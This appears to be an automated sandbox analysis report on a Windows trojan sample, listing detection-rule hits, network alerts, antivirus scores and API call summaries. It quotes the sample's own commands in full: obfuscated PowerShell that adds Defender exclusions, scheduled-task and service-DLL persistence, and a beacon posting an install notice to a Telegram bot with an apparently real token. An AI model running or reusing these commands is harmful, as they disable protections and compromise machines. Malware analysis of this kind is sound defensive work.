    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;", CommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 1900, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;", ProcessId: 6540, ProcessName: cmd.exe
    Sigma detected: Invoke-Obfuscation CLIP+ Launcher
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 6308, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 5448, ProcessName: cmd.exe
    Sigma detected: Invoke-Obfuscation VAR+ Launcher
    Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 6308, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 5448, ProcessName: cmd.exe
    Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;", CommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 1900, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;", ProcessId: 6540, ProcessName: cmd.exe
    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 1900, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", ProcessId: 1848, ProcessName: cmd.exe
    Sigma detected: Suspicious New Service Creation
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f && sc start x882081, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5956, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 5240, ProcessName: sc.exe
    Sigma detected: Suspicious Script Execution From Temp Folder
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'", CommandLine: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5520, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'", ProcessId: 828, ProcessName: powershell.exe
    Sigma detected: CurrentVersion Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Desktop\curlapp64.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\curlapp64.exe, ProcessId: 5680, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\curlapp64
    Sigma detected: Powershell Defender Exclusion
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 1900, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';", ProcessId: 1848, ProcessName: cmd.exe
    Sigma detected: Usage Of Web Request Commands And Cmdlets
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});", CommandLine: cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows \System32\printui.exe" , ParentImage: C:\Windows \System32\printui.exe, ParentProcessId: 1900, ParentProcessName: printui.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});", ProcessId: 6700, ProcessName: cmd.exe
    Sigma detected: New Service Creation Using Sc.EXE
    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f && sc start x882081, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5956, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 5240, ProcessName: sc.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;", CommandLine: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6540, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;", ProcessId: 6184, ProcessName: powershell.exe
    Sigma detected: Windows Processes Suspicious Parent Directory
    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k DcomLaunch, CommandLine: C:\Windows\System32\svchost.exe -k DcomLaunch, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k DcomLaunch, ProcessId: 1856, ProcessName: svchost.exe

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Sigma detected: Powershell launch regsvr32
    Source: Process startedAuthor: Joe Security: Data: Command: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'", CommandLine: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\bav64.exe" , ParentImage: C:\Windows\System32\bav64.exe, ParentProcessId: 576, ParentProcessName: bav64.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'", ProcessId: 5776, ProcessName: cmd.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-05T10:46:18.886535+010020229301A Network Trojan was detected20.12.23.50443192.168.2.549721TCP
    2024-11-05T10:46:58.151307+010020229301A Network Trojan was detected20.12.23.50443192.168.2.552819TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\Desktop\curlapp64.exeReversingLabs: Detection: 34%
    Source: C:\Windows\System32\console_zero.exeReversingLabs: Detection: 75%
    Source: C:\Windows\System32\x882081.datReversingLabs: Detection: 54%
    Multi AV Scanner detection for submitted file
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeReversingLabs: Detection: 39%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
    Machine Learning detection for sample
    Source: SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeJoe Sandbox ML: detected
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EC04A6 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,_wcsdup,CertOpenStore,GetLastError,free,free,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,calloc,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,malloc,fclose,free,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,free,5_2_00007FF8B7EC04A6
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E918B0 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00007FF8B7E918B0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E918A0 CryptHashData,5_2_00007FF8B7E918A0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EC28A0 CertGetNameStringW,malloc,CertFindExtension,CryptDecodeObjectEx,free,free,CertFreeCertificateContext,5_2_00007FF8B7EC28A0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E91820 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,5_2_00007FF8B7E91820
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E916F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00007FF8B7E916F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EA75F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00007FF8B7EA75F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EA7560 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00007FF8B7EA7560
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EA74E0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,5_2_00007FF8B7EA74E0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EC31F0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,5_2_00007FF8B7EC31F0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EBFF30 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,5_2_00007FF8B7EBFF30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7EC2CC0 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,5_2_00007FF8B7EC2CC0
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: 5_2_00007FF8B7E72B80 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,5_2_00007FF8B7E72B80
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4DAA0 CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_new_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_new,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_memdup,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,49_2_00007FF8B7E4DAA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E442D0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,ERR_new,ERR_set_debug,CRYPTO_strdup,OPENSSL_LH_new,OPENSSL_LH_set_thunks,ERR_new,X509_STORE_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,OPENSSL_sk_num,ERR_new,OPENSSL_sk_new_null,ERR_new,OPENSSL_sk_new_null,ERR_new,CRYPTO_new_ex_data,ERR_new,RAND_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,RAND_priv_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,49_2_00007FF8B7E442D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E42F50 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,CRYPTO_THREAD_run_once,49_2_00007FF8B7E42F50
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E818E9 CRYPTO_malloc,CRYPTO_free,49_2_00007FF8B7E818E9
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E918D0 CRYPTO_free,49_2_00007FF8B7E918D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E678D0 BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E678D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E6B8D0 CRYPTO_free,CRYPTO_free,OSSL_ERR_STATE_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E6B8D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA38C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,49_2_00007FF8B7EA38C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9B8C0 CRYPTO_free,49_2_00007FF8B7E9B8C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9B870 CRYPTO_free,49_2_00007FF8B7E9B870
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E37870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,49_2_00007FF8B7E37870
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,49_2_00007FF8B7EA985F
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E39850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,49_2_00007FF8B7E39850
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E45840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,49_2_00007FF8B7E45840
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E53840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E53840
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E43820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc,49_2_00007FF8B7E43820
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E45780 a2i_IPADDRESS,ASN1_OCTET_STRING_free,X509_VERIFY_PARAM_get1_ip_asc,CRYPTO_free,X509_VERIFY_PARAM_add1_host,49_2_00007FF8B7E45780
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA5760 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EA5760
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E31740 CRYPTO_zalloc,CRYPTO_free,49_2_00007FF8B7E31740
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E99730 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_free,49_2_00007FF8B7E99730
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E43700 CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E43700
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EAB6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,49_2_00007FF8B7EAB6E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E976D0 CRYPTO_free,49_2_00007FF8B7E976D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E656D0 CRYPTO_zalloc,49_2_00007FF8B7E656D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E836D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E836D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E336C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,49_2_00007FF8B7E336C0
